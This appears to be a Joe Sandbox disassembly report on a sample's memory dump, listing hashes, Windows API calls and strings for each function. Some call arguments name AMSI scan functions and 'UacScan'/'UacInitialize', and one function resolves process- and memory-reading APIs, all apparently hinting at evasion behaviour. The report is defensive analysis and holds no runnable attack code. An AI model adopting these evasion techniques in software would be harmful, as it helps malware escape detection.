Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
Instruction ID: 5fabf5d128ffc6cbcb545cc9ff6c032aba9bfc033b1e4f1f0c2c08fdb14a8b12
Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
Instruction Fuzzy Hash: 41D05BB23491507BE224965A5D48EB75BDCCBC67B4F10463EF558C7180D7208C05C671

Function 02E67E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02E8356F,ScanString,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,Initialize), ref: 02E67E8B

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
Instruction ID: a02bf342b018baa32ffd95eb1b0c2bb1828a560ff8d547137f48bde6ddccec4a
Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
Instruction Fuzzy Hash: 9BC08CF22E12010E1E60A6FC2CCC23942C989851BC760FE25F438CA2C1D31A9C6A2820

Function 02E67E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02E8041F,ScanString,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8,UacScan,02EE7380,02E8B7B8,UacInitialize), ref: 02E67E67

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
Instruction ID: 0c618d0497beec5c8984c1d9c1c14b06ed0654521b6e1a274475f768d2c1da45
Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
Instruction Fuzzy Hash: 7EC08CB02D12000A5A6066FC2CCC27952CA89052BC364FA25F438C62E2D32698EA6810

Function 02E64C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02E64C8B

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
Instruction ID: 6350a11e5674882a0d57a031be0d11fe1f0214c8a3dc8a72edf5b971b89639b6
Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
Instruction Fuzzy Hash: EAC012A26C023057FB315699ACC87A262CD9B052D8B1450A1A408DB390E360980056A0

Function 02E8C35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,02E8C350,00000000,00000001), ref: 02E8C36C

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: 6f83a436978c5269780bb4c2b997a729376bc633067643d6d4ddbb250eeb2648
Instruction ID: dc3515bad4c3fd619533eaa8ead4ece0a127410cd49ae0e5be3e409145a1c74b
Opcode Fuzzy Hash: 6f83a436978c5269780bb4c2b997a729376bc633067643d6d4ddbb250eeb2648
Instruction Fuzzy Hash: D5C04CB17D13006AF91055A55C86F32559D9306751F206452B648E91C1D6A258514E64

Function 02E64C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 02E64C3F

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
Instruction ID: a48d08e864ad3a41f0dfd98dfb7dc53f75a85d28f7d1dc8387a0f8a1c2ca311f
Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
Instruction Fuzzy Hash: D6B012342C820515FA3923620F0C7F3004E0B622CEF84F051AF1CCC2D1FB00C0019836

Function 02E64C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 02E64C57

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
Instruction ID: a0eb9432de24011bddd46709e5f3b91afd45a10b10f38b8bbce729ee780fa04c
Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
Instruction Fuzzy Hash: CEA011A80C02020AAA2B2228002803A22232EC02C8388E0A822088A282CA2A8000A8A0

Function 02E615CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02E61A03), ref: 02E615E2

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ad77a380d83d45875d880724e91c6513b04d9cdc4579fc15c100246a3b70aaf2
Instruction ID: 1fd1d67324dedcdcbdb77edb2f09fdf8f455fa6933c8d0a6687db8287531bebe
Opcode Fuzzy Hash: ad77a380d83d45875d880724e91c6513b04d9cdc4579fc15c100246a3b70aaf2
Instruction Fuzzy Hash: 48F019F0BC12008FDB068EBA99463156AE6E78A288F508579E609DF3D8E77184418B84

Function 02E61682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02E616A4

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9700230e9756a934251e315ba052490b6461308fa95c7cf9f8983fcb0b46e8c2
Instruction ID: 7a7ff4fdc1196f30e2152f28f65c5ad28991d039b8fcbff70db4f208668230b2
Opcode Fuzzy Hash: 9700230e9756a934251e315ba052490b6461308fa95c7cf9f8983fcb0b46e8c2
Instruction Fuzzy Hash: 9EF0B4B2BC0795ABDB219F5ADC85796BB98FB10364F458139F90C9F340D770A850CB94

Function 02E616E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02E61FE4), ref: 02E61704

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 82d03e3392de2983448b19f087be712b41610e9f8405baf0806005541e6f849d
Instruction ID: b211f9e2df926113e2413bd4a34ce24c30bdd0cb768707f6ea24e0001f8b34e8
Opcode Fuzzy Hash: 82d03e3392de2983448b19f087be712b41610e9f8405baf0806005541e6f849d
Instruction Fuzzy Hash: A9E026753C0300AFDB100E7A4C497227BCCEB556A4F189435F108CF341C2A0E8008B20

Non-executed Functions

Function 02E7AB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02E7ADA3,?,?,02E7AE35,00000000,02E7AF11), ref: 02E7AB30
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02E7AB48
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02E7AB5A
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02E7AB6C
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02E7AB7E
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02E7AB90
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02E7ABA2
GetProcAddress.KERNEL32(00000000,Process32First), ref: 02E7ABB4
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02E7ABC6
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02E7ABD8
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02E7ABEA
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02E7ABFC
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02E7AC0E
GetProcAddress.KERNEL32(00000000,Module32First), ref: 02E7AC20
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02E7AC32
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02E7AC44
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02E7AC56

Strings

Heap32ListNext, xrefs: 02E7AB64
Process32Next, xrefs: 02E7ABBE
Process32NextW, xrefs: 02E7ABE2
Toolhelp32ReadProcessMemory, xrefs: 02E7AB9A
Module32Next, xrefs: 02E7AC2A
Heap32First, xrefs: 02E7AB76
Heap32ListFirst, xrefs: 02E7AB52
kernel32.dll, xrefs: 02E7AB2B
Process32First, xrefs: 02E7ABAC
Heap32Next, xrefs: 02E7AB88
Module32NextW, xrefs: 02E7AC4E
Thread32First, xrefs: 02E7ABF4
Thread32Next, xrefs: 02E7AC06
Module32FirstW, xrefs: 02E7AC3C
CreateToolhelp32Snapshot, xrefs: 02E7AB40
Module32First, xrefs: 02E7AC18
Process32FirstW, xrefs: 02E7ABD0

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: 772a42bb2220645ab3f0705fc5b6f70b9c6e849a515bf3e24a413116d2098cd2
Instruction ID: 4c243bc3d963f8874fc19b5e4dbac29032b1e4048c4a4fe0558bcf82e0da216b
Opcode Fuzzy Hash: 772a42bb2220645ab3f0705fc5b6f70b9c6e849a515bf3e24a413116d2098cd2
Instruction Fuzzy Hash: 9131D0B09D0750EFEF00EBB5E889A3D77A9AB16741740AD75B811DF304E6B8A494CF12

Function 02E65908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,02E66C14,02E60000,02E8E790), ref: 02E65925
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02E6593C
lstrcpynA.KERNEL32(?,?,?), ref: 02E6596C
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02E66C14,02E60000,02E8E790), ref: 02E659D0
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02E66C14,02E60000,02E8E790), ref: 02E65A06
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02E66C14,02E60000,02E8E790), ref: 02E65A19
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E66C14,02E60000,02E8E790), ref: 02E65A2B
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E66C14,02E60000,02E8E790), ref: 02E65A37
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E66C14,02E60000), ref: 02E65A6B
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E66C14), ref: 02E65A77
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02E65A99

Strings

kernel32.dll, xrefs: 02E65920
\, xrefs: 02E65A49
GetLongPathNameA, xrefs: 02E65933

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: b4d96bdb3b1d0cc0ce72512c286c0b8951eea9d8b0c7e0019d784060380b4bbb
Instruction ID: 6b477fa5903df99eb00a24ec5fc77aaab43239bf0a73f7da22a109477182d261
Opcode Fuzzy Hash: b4d96bdb3b1d0cc0ce72512c286c0b8951eea9d8b0c7e0019d784060380b4bbb
Instruction Fuzzy Hash: 36417271EC0619AFDB11DAE8CC8CAFEB7BDAF04394F4495A5A158E7241D7309A448F50

Function 02E65BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02E65BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02E65BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02E65BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02E65C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E65C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E65C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E65CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E65CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02E65CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02E65CEB

Strings

Software\Borland\Delphi\Locales, xrefs: 02E65B38
Software\Borland\Locales, xrefs: 02E65AFC, 02E65B1A

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction ID: 45d9eb36cda063c1915bdce357545febaefd88e9a5d1a2855c5b68cb26bf6084
Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction Fuzzy Hash: D131A971FC025C2AEB26D6B48C4DFFE77AE5B043C4F44A1A1A648E6181D7749E448F50

Function 02E67FD4 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02E67FF5

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
Instruction ID: b5e446b251dc1d27b87c95481320ca9f9036ae8b6130cb24583c233f140a5b79
Opcode Fuzzy Hash: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
Instruction Fuzzy Hash: AF111EB5E40209AF9B00CF99CC81DBFF7F9FFC9700B54C569A408E7254E671AA018BA0

Function 02E6A7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E6A7E2

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
Instruction ID: f0c37261ab6db053e10553a06c8b861ca197687e6dec7a05d29167a6bd65f8f3
Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
Instruction Fuzzy Hash: 5BE0D872BD021417D711A558AC88EFA725D9758390F00D27ABD05D73C5FEF09E804AE9

Function 02E6B78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,02E8D106,00000000,02E8D11E), ref: 02E6B79A

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 3fd9fcdbdc3e537f77e90d528ccdf5a8ce3cc9fee60a27765ebfe62f102516e6
Instruction ID: bb3b8bec8c1f0b68af03ee4f02a35f1e70013656d3957c9a98d723fcf84eaeff
Opcode Fuzzy Hash: 3fd9fcdbdc3e537f77e90d528ccdf5a8ce3cc9fee60a27765ebfe62f102516e6
Instruction Fuzzy Hash: DEF0F4749C43019FD350DF2AD84662577E9FB49744F889D28F6D8C7380E739A454CB52

Function 02E6A810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02E6BE72,00000000,02E6C08B,?,?,00000000,00000000), ref: 02E6A823

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
